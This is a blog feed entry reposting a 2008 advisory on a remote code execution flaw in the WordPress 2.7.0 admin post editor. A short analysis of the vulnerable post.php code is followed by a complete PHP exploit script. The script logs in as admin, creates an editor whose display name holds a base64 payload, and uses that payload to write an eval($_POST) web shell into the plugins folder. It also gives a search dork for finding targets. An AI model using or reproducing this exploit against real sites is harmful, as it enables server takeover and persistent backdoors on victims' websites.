kypan's 札記 » 資訊安全 http://note.ajneok.org Sun, 06 Feb 2011 08:24:48 +0000 en hourly 1 http://wordpress.org/?v=3.2.1 WordPress 2.7.0 admin remote code execution vulnerability http://note.ajneok.org/uncategorized/wordpress-270-admin-remote-code-execution-vulnerability/ http://note.ajneok.org/uncategorized/wordpress-270-admin-remote-code-execution-vulnerability/#comments Tue, 23 Dec 2008 08:03:16 +0000 kypan http://note.ajneok.org/?p=167

by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
date: 2008-12-18

一分析:
這個漏洞出在後台:wp-admin/post.php

  1. if ( current_user_can('edit_post', $post_ID) ) {
  2.         if ( $last = wp_check_post_lock( $post->ID ) ) {
  3.             $last_user = get_userdata( $last );
  4.             $last_user_name = $last_user ? $last_user->display_name : __('Somebody');
  5.             $message = sprintf( __( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );
  6.             $message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );
  7.             //提交\'經過此處代碼處理後變為\\' :)
  8.             add_action('admin_notices', create_function( '', "echo '$message';" ) );
  9.             //利用上面的方法閉合echo後面的單引號,就可以執行命令了[ex:\';phpinfo();\'];另外這個地方也可以利用create_function函數自身的一個bug[1]來執行命令[ex:\';}phpinfo();//]
  10.         } else {
  11.             wp_set_post_lock( $post->ID );
  12.             wp_enqueue_script('autosave');
  13.         }
  14.     }


exploit:

  1. #!/usr/bin/php
  2. <?php
  3.  
  4. print_r('
  5. +---------------------------------------------------------------------------+
  6. Wordpress 2.7.0 remote code execution exploit
  7. by puret_t
  8. mail: puretot at gmail dot com
  9. team: http://www.wolvez.org
  10. site: http://www.80vul.com
  11. dork: "powered by WordPress"
  12. +---------------------------------------------------------------------------+
  13. ');
  14. /**
  15. * works regardless of php.ini settings
  16. */
  17. if ($argc < 6) {
  18.     print_r('
  19. +---------------------------------------------------------------------------+
  20. Usage: php '.$argv[0].' host path user pass post
  21. host:      target server (ip/hostname)
  22. path:      path to wordpress
  23. user:      admin login username
  24. pass:      admin login password
  25. post:      the available post id
  26. Example:
  27. php '.$argv[0].' localhost /wp/ admin 123456 1
  28. +---------------------------------------------------------------------------+
  29. ');
  30.     exit;
  31. }
  32.  
  33. error_reporting(7);
  34. ini_set('max_execution_time', 0);
  35.  
  36. $host = $argv[1];
  37. $path = $argv[2];
  38. $user = $argv[3];
  39. $pass = $argv[4];
  40. $post = $argv[5];
  41.  
  42. $shellcode = '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\'';
  43. //$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//';
  44. $shell = 'http://'.$host.$path.'wp-content/plugins/wolvez.php';
  45. /**
  46. * wolvez.php has this code:
  47. * <?eval($_POST[c])?>
  48. */
  49. $url = $path.'wp-login.php';
  50. $cmd = 'log='.urlencode($user).'&pwd='.urlencode($pass);
  51. $resp = send();
  52. preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);
  53.  
  54. if (!$admin_cookie)
  55.     exit("Exploit Failed!\n");
  56.    
  57. $url = $path.'wp-admin/user-new.php#add-new-user';
  58. $cmd = '';
  59. $resp = send($admin_cookie[1]);
  60. preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/', $resp, $_wpnonce);
  61.  
  62. if (!$_wpnonce)
  63.     exit("Exploit Failed!\n");
  64.  
  65. $cmd = '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode;
  66. $resp = send($admin_cookie[1]);
  67.  
  68. if (strpos($resp, 'users.php?usersearch=ryat&update=add#user') === false)
  69.     exit("Exploit Failed!\n");
  70.  
  71. $url = $path.'wp-login.php';
  72. $cmd = 'log=ryat&pwd=123456';
  73. $resp = send();
  74. preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);
  75.  
  76. if (!$editor_cookie)
  77.     exit("Exploit Failed!\n");
  78.  
  79. $url = $path.'wp-admin/post.php?action=edit&post='.$post;
  80. $cmd = '';
  81. send($editor_cookie[1]);
  82. send($admin_cookie[1]);
  83.  
  84. if (strpos(file_get_contents($shell), 'puret_t') !== false)
  85.     exit("Expoilt Success!\nView Your shell:\t$shell\n");
  86. else
  87.     exit("Exploit Failed!\n");
  88.  
  89. function send($cookie = '')
  90. {
  91.     global $host, $path, $url, $cmd;
  92.  
  93.     $data = "POST $url  HTTP/1.1\r\n";
  94.     $data .= "Accept: */*\r\n";
  95.     $data .= "Accept-Language: zh-cn\r\n";
  96.     $data .= "Referer: http://$host$path\r\n";
  97.     $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
  98.     $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
  99.     $data .= "Host: $host\r\n";
  100.     $data .= "Content-Length: ".strlen($cmd)."\r\n";
  101.     $data .= "Connection: Close\r\n";
  102.     $data .= "Cookie: $cookie\r\n\r\n";
  103.     $data .= $cmd;
  104.  
  105.     $fp = fsockopen($host, 80);
  106.     fputs($fp, $data);
  107.  
  108.     $resp = '';
  109.  
  110.     while ($fp && !feof($fp))
  111.         $resp .= fread($fp, 1024);
  112.  
  113.     return $resp;
  114. }
  115. ?>
]]> http://note.ajneok.org/uncategorized/wordpress-270-admin-remote-code-execution-vulnerability/feed/ 0